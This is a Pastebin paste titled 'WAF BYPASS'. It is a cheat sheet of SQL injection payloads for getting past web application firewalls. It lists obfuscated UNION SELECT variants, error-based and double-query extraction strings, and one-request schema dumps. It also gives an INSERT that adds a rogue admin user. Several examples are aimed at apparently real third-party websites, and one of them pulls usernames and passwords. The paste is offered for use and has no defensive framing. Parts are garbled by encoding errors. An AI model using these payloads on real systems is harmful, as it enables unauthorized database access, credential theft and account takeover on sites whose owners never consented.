API tools faq
paste
Advertisement
GLADzTeguhID

WAF BYPASS

GLADzTeguhID
Nov 4th, 2016
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.54 KB | None | 0 0
raw download clone embed print report
  1. --'- : +--+ / : -- - : --+- : /*
  2. ) order by 1-- -
  3. ') order by 1-- -
  4.  
  5. ')order by 1%23%23
  6.  
  7. %')order by 1%23%23
  8.  
  9. Null' order by 100--+
  10.  
  11. Null' order by 9999--+
  12.  
  13. ')group by 99-- -
  14.  
  15. 'group by 119449-- -
  16.  
  17. 'group/**/by/**/99%23%23
  18.  
  19. union select ByPassing method
  20.  
  21. +union+distinct+select+
  22.  
  23. +union+distinctROW+select+
  24.  
  25. /**//*!12345UNION SELECT*//**/
  26.  
  27. /**//*!50000UNION SELECT*//**/
  28.  
  29. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  30.  
  31. +/*!u%6eion*/+/*!se%6cect*/+
  32.  
  33. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  34.  
  35. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  36.  
  37. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  38.  
  39. union /*!50000%53elect*/
  40.  
  41. %55nion %53elect
  42.  
  43. +--+Union+--+Select+--+
  44.  
  45. +UnIoN/*&a=*/SeLeCT/*&a=*/
  46.  
  47. id=1+’UnI”On’+'SeL”ECT’
  48.  
  49. id=1+'UnI'||'on'+SeLeCT'
  50.  
  51. UnIoN SeLeCt CoNcAt(version())--
  52.  
  53. uNiOn aLl sElEcT
  54.  
  55. uUNIONnion all sSELECTelect
  56.  
  57.  
  58. :: Buffer Overflow ::
  59.  
  60. +And(select 1)=(select 0×414)+union+select+1–
  61.  
  62. +And(select 1)=(select 0xAAAA)+union+select+1–
  63.  
  64. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 1414141)+
  65.  
  66. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  67.  
  68.  
  69. :: 400 Bad Request ::
  70.  
  71. –+%0A
  72.  
  73. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  74.  
  75. null the parameter
  76.  
  77. id=-1
  78.  
  79. id=null
  80.  
  81. id=1+and+false+
  82.  
  83. id=9999
  84.  
  85. id=1 and 0
  86.  
  87. id==1
  88.  
  89. id=(-1)
  90.  
  91. Group_Concat
  92.  
  93. group_concat()
  94.  
  95. /*!group_concat*/()
  96.  
  97. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  98.  
  99. group_concat(,0x3c62723e)
  100.  
  101. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  102.  
  103. CoNcAt()
  104.  
  105. CONCAT(DISTINCT Version())
  106.  
  107. concat(,0x3a,)
  108.  
  109. concat%00()
  110.  
  111. %00CoNcAt()
  112.  
  113. /*!50000cOnCat*/(/*!Version()*/)
  114.  
  115. /*!50000cOnCat*/
  116.  
  117. /**//*!12345cOnCat*/(,0x3a,)
  118.  
  119. concat_ws()
  120.  
  121. concat(0x3a,,0x3c62723e)
  122.  
  123. /*!concat_ws(0x3a,)*/
  124.  
  125. concat_ws(0x3a3a3a,version()
  126.  
  127. CONCAT_WS(CHAR(32,58,32),version(),)
  128.  
  129. REVERSE(tacnoc)
  130.  
  131. binary(version())
  132.  
  133. uncompress(compress(version()))
  134.  
  135. aes_decrypt(aes_encrypt(version(),1),1)
  136.  
  137.  
  138. To appear column numbEr in page put after id ---->
  139.  
  140. id=1+and+1=0+union+select+1,2,3,4,5,6
  141.  
  142. +AND+1=0
  143.  
  144. /*!aND*/ 1 like 0
  145.  
  146. +/*!and*/+1=0
  147.  
  148. +and+2>3+
  149.  
  150. +and(1)=(0)
  151.  
  152. and (1)!=(0)
  153.  
  154. +div+0
  155.  
  156. Having+1=0
  157.  
  158. Function ByPassing ---->
  159.  
  160. unhex(hex(value))
  161.  
  162. cast(value as char)
  163.  
  164. uncompress(compress(version()))
  165.  
  166. cast(version() as char)
  167.  
  168. aes_decrypt(aes_encrypt(version(),1),1)
  169.  
  170. binary(version())
  171.  
  172. convert(value using ascii)
  173.  
  174. Avoid source page injection --->
  175.  
  176. concat(?”>,
  177.  
  178. ,@@version,?
  179.  
  180. “>
  181. ?
  182.  
  183. injection
  184.  
  185. concat(0x223e,@@version)
  186.  
  187. concat(0x273e27,version(),0x3c212d2d)
  188.  
  189. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  190.  
  191. concat(0x223e,@@version,0x3c696d67207372633d22)
  192.  
  193. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
  194.  
  195. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  196.  
  197. concat(‘’,@@version,’’)
  198.  
  199. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  200.  
  201. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  202.  
  203.  
  204. get version – DB_NAME – user – HOST_NAME – datadir
  205. ----->
  206. version()
  207.  
  208. convert(version() using latin1)
  209.  
  210. unhex(hex(version()))
  211.  
  212. @@GLOBAL.VERSION
  213.  
  214. (substr(@@version,1,1)=5) :: 1 true 0 false
  215.  
  216. like -->
  217. http : //www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  218.  
  219.  
  220. +and substring(version(),1,1)=4
  221.  
  222. +and substring(version(),1,1)=5
  223.  
  224. +and substring(version(),1,1)=9
  225.  
  226. +and substring(version(),1,1)=10
  227.  
  228. id=1 /*!50094aaaa*/ error
  229.  
  230. id=1 /*!50095aaaa*/ no error
  231.  
  232. id=1 /*!50096aaaa*/ error
  233.  
  234. like --->
  235. http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  236.  
  237. id=1 /*!40123 1=1*/–+- no error
  238.  
  239. id=1 /*!40122rrrr*/ no error
  240.  
  241. like -->
  242. http : //www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  243.  
  244. DB_NAME() --->
  245. @@database
  246. database()
  247. id=vv()
  248.  
  249. like -->
  250. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  251.  
  252. http : // http://www.marinaplast.com/page.php?id=vv()
  253. @@user
  254. user()
  255. user_name()
  256. system_user()
  257. like -->
  258. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  259.  
  260. HOST_NAME()
  261. @@hostname
  262. @@servername
  263. SERVERPROPERTY()
  264.  
  265. like --->
  266. http : / / http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  267. @@datadir
  268. datadir()
  269. like --> http : / /www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  270. ASPX
  271. and 1=0/@@version
  272. ‘ and 1=0/@@version;–
  273. ‘) and 1=@@version–
  274. and 1=0/user;–
  275.  
  276. Requested method
  277. [DUMP DB in 1 Request]
  278.  
  279. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  280.  
  281. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  282.  
  283. [DUMP DB in 1 Request improve]
  284.  
  285. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where​(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,​0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  286.  
  287. like
  288. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c​ oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  289.  
  290. #2#
  291.  
  292. method like DUMP DB in 1 Request
  293.  
  294. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  295. like
  296. http : // http://www.mishnetorah.com/shop/details....T(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  297.  
  298. #3#
  299. databases
  300.  
  301. (select+count(schema_name) +from+information_schema.schemata)
  302.  
  303. # like #
  304. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  305.  
  306. tables
  307. (select+count(table_name) +from+information_schema.tables)
  308. # like #
  309. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  310.  
  311. columns
  312. (select+count(column_name) +from+information_schema.columns)
  313. # like #
  314. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  315.  
  316. #4#
  317.  
  318. show the table with all her columns
  319.  
  320. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  321.  
  322. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  323.  
  324. like
  325. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  326.  
  327. #5#WAF filtered requested
  328.  
  329. # tables #
  330. group_concat(/*!table_name*/)
  331.  
  332. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  333.  
  334. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  335.  
  336. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  337.  
  338. # columns #
  339.  
  340. group_concat(/*!column_name*/)
  341.  
  342. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  343.  
  344. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  345.  
  346. /*!froM*/ table– -
  347.  
  348. #6#
  349.  
  350. bypass method
  351.  
  352. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  353.  
  354. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  355.  
  356. like
  357. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  358.  
  359. #7#
  360.  
  361. bypass method
  362.  
  363. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  364.  
  365. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  366.  
  367. like
  368. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  369.  
  370.  
  371. [+] Buffer overflow:
  372.  
  373. +And(select 1)=(select 0×414)+union+select+1–
  374. +And(select 1)=(select 0xAAAA)+union+select+1–
  375. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  376. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  377. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 1414141414141414141414141414141414141414141414141414141414141414141414141414?141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 4141)+
  378.  
  379. [+] Group Concat:
  380.  
  381. Group_Concat
  382. group_concat()
  383. /*!group_concat*/()
  384. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  385. group_concat(,0x3c62723e)
  386. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  387. CoNcAt()
  388. CONCAT(DISTINCT Version())
  389. concat(,0x3a,)
  390. concat%00()
  391. %00CoNcAt()
  392. /*!50000cOnCat*/(/*!Version()*/)
  393. /*!50000cOnCat*/
  394. /**//*!12345cOnCat*/(,0x3a,)
  395. concat_ws()
  396. concat(0x3a,,0x3c62723e)
  397. /*!concat_ws(0x3a,)*/
  398. concat_ws(0x3a3a3a,version()
  399. CONCAT_WS(CHAR(32,58,32),version(),)
  400.  
  401. ERORE BASED
  402.  
  403. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  404.  
  405. Database
  406.  
  407. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  408.  
  409. Table_name
  410.  
  411. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  412.  
  413. Columns
  414.  
  415. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  416.  
  417. extract date
  418.  
  419. http : // http://www.aliqbalschools.org/index.php?...&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  420.  
  421. Notice the limit function in the query
  422. A website can have more than 2 two databases, so increase the limit until you find all database names
  423. Example: limit 0,1 or limit 1,1 or limit 2,1
  424.  
  425. Differences:
  426. Error Based Query for Database Extraction:
  427.  
  428. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  429.  
  430. Double Query for Database Extraction:
  431.  
  432. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  433. information_schema.tables group by x)a) and 1=1
  434.  
  435. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  436. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  437. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  438.  
  439. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  440. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  441. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  442. information_schema.tables group by x)a) and 1
  443.  
  444.  
  445. http : //zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20versio​n%28%29%29b%20join%20%28select%20database%28%29%29c%29–+
  446.  
  447. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  448.  
  449. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  450.  
  451. injection in sql database addd new user
  452. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  453.  
  454. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam​ e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE​ X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  455.  
  456. CHALLENGES
  457.  
  458. Code:
  459. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(informat​ion_schema.columns)where(table_schema=database())and(table_name=0×73656375726974​79))–+-
  460. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d6​26c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  461. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  462. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  463. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  464. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  465. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  466.  
  467. Error Based:
  468.  
  469. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  470.  
  471. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  472.  
  473. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  474. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  475.  
  476. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  477.  
  478. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  479.  
  480. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_​ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  481.  
  482. or 1=convert(int,(@@version))-
  483. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  484. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,​ 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  485.  
  486. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75​653e706833776c,7,8,9,(10))–+-
  487.  
  488.  
  489. =1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)wh​ere(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x20202​03d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  490.  
  491. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  492. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  493.  
  494. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  495.  
  496. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  497.  
  498. ------------Best Bypass WAF------------
  499.  
  500. http://pastebin.com/YFJHXAEF
  501.  
  502. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  503. +div+0
  504. Having+1=0
  505. +AND+1=0
  506. +/*!and*/+1=0
  507. and(1)=(0)
  508. when the --+- or -- dosen't work use ;%00
  509.  
  510. Bypass error 505
  511. sometimes when union select ,sites become 505 or time out....
  512. bypass-
  513. -use brackets
  514. union(select+1)
  515. -use %0b or /**/ as space
  516. union%0bselect
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!